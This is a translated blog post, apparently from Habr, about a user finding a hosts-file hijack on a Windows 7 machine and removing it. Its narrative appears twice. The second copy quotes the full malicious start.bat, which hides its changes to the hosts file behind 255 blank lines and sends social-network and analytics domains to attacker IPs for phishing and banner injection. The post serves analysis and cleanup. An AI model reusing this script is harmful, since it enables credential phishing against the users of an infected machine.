Easy penetration or fight with an uncomplicated virus
An exciting action takes place on your computer quite unexpectedly and, as a rule, at the most inappropriate moment. It all starts simply, you go to your favorite site or social network and discover something unusual ...
So it was with my computer. I go to the site, I see an indecent picture in the left corner (advertising banner). 2 thoughts flashed through my head:
After wandering through several sites and not seeing this very banner, I concluded that the site was still infected. Since this was a fairly large company site, I called those. support We listened, expressed gratitude for vigilance, but during the conversation they said that they did not display this banner under any browser.
I began to explore the site, and I see that in the Yandex metrics code there is a line like this:
')
That she shows the banner. It is not entirely clear how this is done in the tag, but it is clear that the link to the image is phishing.
Go to the hosts file (% windir% \ system32 \ drivers \ etc \ hosts).
And here a serious mistake was made by me: I opened it, I looked, the whole number, I closed it. However, he did not pay attention to the scroll bar that appeared.
Go to startup (Start-> Run-> msconfig) and find the file start.bat there with the following contents:
It becomes clear that the first line of the batch file in the hosts creates 255 blank lines. That is why, looking into the hosts, I did not see anything. It was necessary to go to the very end to notice the modification.
Thus, on all sites on which Google Analytics and Yandex metrics stood, this ad banner appeared. And in all social networks a phishing site was laid, where you could easily provide access to your page to the “enemy”.
It was necessary to remove the batch file from the startup, clean the hosts, as everything fell into place. The method of penetration of the pest on the computer has remained a mystery.
In this whole story, the following remains surprising:
So it was with my computer. I go to the site, I see an indecent picture in the left corner (advertising banner). 2 thoughts flashed through my head:
- my browser is infected
- infected site
After wandering through several sites and not seeing this very banner, I concluded that the site was still infected. Since this was a fairly large company site, I called those. support We listened, expressed gratitude for vigilance, but during the conversation they said that they did not display this banner under any browser.
Site analysis
I began to explore the site, and I see that in the Yandex metrics code there is a line like this:
')
<noscript><div><img src="//mc.yandex.ru/watch/image2.jpg" style="position:absolute; ..." alt=""></div></noscript> That she shows the banner. It is not entirely clear how this is done in the tag, but it is clear that the link to the image is phishing.
Hosts file
Go to the hosts file (% windir% \ system32 \ drivers \ etc \ hosts).
And here a serious mistake was made by me: I opened it, I looked, the whole number, I closed it. However, he did not pay attention to the scroll bar that appeared.
Autoload
Go to startup (Start-> Run-> msconfig) and find the file start.bat there with the following contents:
FOR /L %%i IN (1,1,255) DO echo. >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 obhodilka.ru raskruty.ru jelya.ru pinun.ru websplatt.ru diazoom.ru anonim.ttu.su >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 webvpn.org unboo.ru anonim.do.am anonimvk.ru nemir.ru vkanonim.ru nezayti.ru >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 webmurk.ru waitplay.ru dostupest.ru anonimix.ru nekontakt2.ru hellhead.ru >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 razblokirovatdostup.ru antiblock.ru dardan.ru o.vhodilka.ru cameleo.ru spoolls.com >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 adminimus.ru netdostupa.com dostyp.ru anonymizer.ru xy4-anonymizer.ru v.vhodilka.ru >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 vhodilka.ru ok-anonimaizer.ru neklassniki.ru timp.ru urlbl.ru workandtalk.ru >> %windir%\system32\drivers\etc\hosts echo 46.251.249.137 m.odnoklassniki.ru my.mail.ru www.odnoklassniki.ru vk.com odnoklassniki.ru m.vk.com wap.odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts echo 46.251.249.136 mc.yandex.ru admulti.com counter.rambler.ru counter.spylog.com www.google-analytics.com >> %windir%\system32\drivers\etc\hosts.txt It becomes clear that the first line of the batch file in the hosts creates 255 blank lines. That is why, looking into the hosts, I did not see anything. It was necessary to go to the very end to notice the modification.
Thus, on all sites on which Google Analytics and Yandex metrics stood, this ad banner appeared. And in all social networks a phishing site was laid, where you could easily provide access to your page to the “enemy”.
It was necessary to remove the batch file from the startup, clean the hosts, as everything fell into place. The method of penetration of the pest on the computer has remained a mystery.
Conclusion
In this whole story, the following remains surprising:
- On the computer was Kaspersky Anti-Virus, which did not show any signs of a struggle with modifying the hosts file, adding a batch file to the autoload, or the appearance of a banner (even after a full scan).
- Windows 7 absolutely calmly allowed to execute start.bat on every boot.
Source: https://habr.com/ru/post/172793/
All Articles